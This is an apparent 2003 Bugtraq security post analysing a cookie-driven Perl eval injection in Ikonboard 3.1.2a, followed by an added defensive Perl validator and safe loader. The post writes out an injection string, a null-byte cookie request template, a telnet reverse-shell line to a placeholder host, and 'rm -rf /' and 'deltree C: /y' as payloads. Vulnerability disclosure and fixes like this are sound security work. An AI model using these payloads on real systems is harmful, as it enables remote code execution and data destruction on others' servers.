Attempts with Ikonboard 3.1.2a

From: Shan Whitman (xzziroz_at_rootshell.be)
Date: 09/10/03

    Date: Wed, 10 Sep 2003 01:44:29 +0200
    To: mike@unixhideout.com, bugtraq@securityfocus.com

    Vendor: Jarvis Entertainment
    Product: Ikonboard
    Version: 3.1.2a and Below (All current versions).

    On the topic of the recent post about Ikonboard and its command execution vulnerabilities:

    In FUNC.pm:

            # Make sure the cookie data is legal
            # (when the value does not match the pattern, this substitution
            # does nothing and the value is left exactly as it was)
            if ($iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'}) {
                $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'} =~ s/^([\d\w]+)$/$1/;
            }

            $default = $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'}
                            || $iB::INFO->{'DEFAULT_LANGUAGE'}
                            || 'en';

            # Quick check to make sure the directory exists
            unless (-d $iB::INFO->{IKON_DIR}."Languages/$default") {
                    $default = 'en';
            }

            # $default is interpolated into Perl source and then evaluated
            my $code = 'require '. "\"$default/" .$area. '.pm"; $lang ='. $area. '->new();';
            eval $code;
            $obj->cgi_error("Could not access the language file: $@") if $@;

            return $lang;
    }

    --------------

    The first bit is of course where the exploit actually occurs. Although we can indefinitely define $default to our own value, I scratched my head for a while trying to figure out how this could be exploited.

    After a few hours of staring I came to the final (and easy) conclusion, which is this:

    If $default were to equal:

    $default = "en/UniversalWords.pm\"; <My code> ; ##"

    (where 'en' is the usual default string contained in $default, UniversalWords is contained in $area, and then the .pm etc.)

    then the eval would simply interpret to the following:

    eval require "en/UniversalWords.pm"; <My Code>; ##/" .$area. '.pm"; $lang = '. $area. '->new().

    so what would happen is the eval would do the require on en/UniversalWords.pm, then it would move on to execute whatever arbitrary Perl code you placed in <My Code>, such as a
    " `telnet bla.bla.bla.bla | /bin/bash | telnet bla.bla.bla.bla` " or worse (hopefully) a deltree C: /y or rm -rf /, seeing as Ikonboard can be run on Linux or Windows.

    The method of injecting the code we wish into $default would be as simple as it is in the exploit for 3.1.1:

    GET $PATH HTTP/1.1
    Host: $HOST
    Cookie: lang=%HEX$HEX%HEX%00 ## Followed by a Null Byte to bypass filters.
    Connection: close

    -------

    As of this moment I have not written a working exploit and am not even 100% sure this would work; seeing as the person who posted this vulnerability a day ago claimed he had a working example, I decided to wait on this to see how it is done.

    --K-sPecial
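The following is an added example and is neither Ikonboard's code nor the poster's. It sets the substitution from FUNC.pm beside a validator that actually rejects bad cookie values, and replaces the string eval with a require on a path built only from whitelisted parts. The function names (ikonboard_style_filter, validated_lang, resolve_lang_module, load_lang_object), the %LANG_PACKS whitelist, the 16-character length bound and every sample value are assumptions made for the illustration.

```perl
#!/usr/bin/perl
# Added example, not Ikonboard code. Sample cookie values are constructed.
use strict;
use warnings;

# Same substitution as FUNC.pm: on a match it replaces the value with itself,
# on a miss it leaves the value alone. Either way nothing is rejected, so the
# return value is always the input unchanged.
sub ikonboard_style_filter {
    my ($lang) = @_;
    $lang =~ s/^([\d\w]+)$/$1/;
    return $lang;
}

# A check that actually rejects: explicit alphabet, bounded length (16 is an
# assumed limit), and \A/\z anchors (unlike $, \z does not match before a
# trailing newline). Quotes, slashes, ';' or a NUL byte fall back to $fallback.
sub validated_lang {
    my ($lang, $fallback) = @_;
    return $fallback
        unless defined $lang && $lang =~ /\A[A-Za-z0-9_]{1,16}\z/;
    return $lang;
}

# Known language packs (assumed list). The loader only assembles a path from
# a key of this hash and a checked $area; it never builds Perl source from
# a cookie value.
my %LANG_PACKS = map { $_ => 1 } qw(en de fr);

sub resolve_lang_module {
    my ($cookie_lang, $area) = @_;
    my $lang = validated_lang($cookie_lang, 'en');
    $lang = 'en' unless exists $LANG_PACKS{$lang};
    die "refusing unexpected area name\n"
        unless defined $area && $area =~ /\A[A-Za-z0-9_]+\z/;
    return "$lang/$area.pm";
}

# What replaces the `eval $code` line: require takes the checked path
# directly, and the class name used for the method call was validated above.
sub load_lang_object {
    my ($cookie_lang, $area) = @_;
    my $path = resolve_lang_module($cookie_lang, $area);
    require $path;            # no eval of interpolated text
    return $area->new();
}

# Demonstration with constructed cookie values: a clean one, one with a
# trailing newline, one containing a NUL byte and one containing a quote.
my @samples = ("en", "en\n", "de", "fr\0x", 'en"; junk');
for my $v (@samples) {
    my $shown = $v;
    $shown =~ s/([^\x20-\x7e])/sprintf('\\x%02x', ord $1)/ge;
    printf "%-14s filter -> %s ; validator -> %s ; module -> %s\n",
        qq("$shown"),
        ikonboard_style_filter($v) eq $v ? 'unchanged' : 'changed',
        validated_lang($v, 'en'),
        resolve_lang_module($v, 'UniversalWords');
}
```

Running it shows the FUNC.pm-style filter reporting "unchanged" for every sample, including the ones with a NUL byte and a quote, while the validator maps each of those to the fallback and the resolver only ever returns a path under a known language directory.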

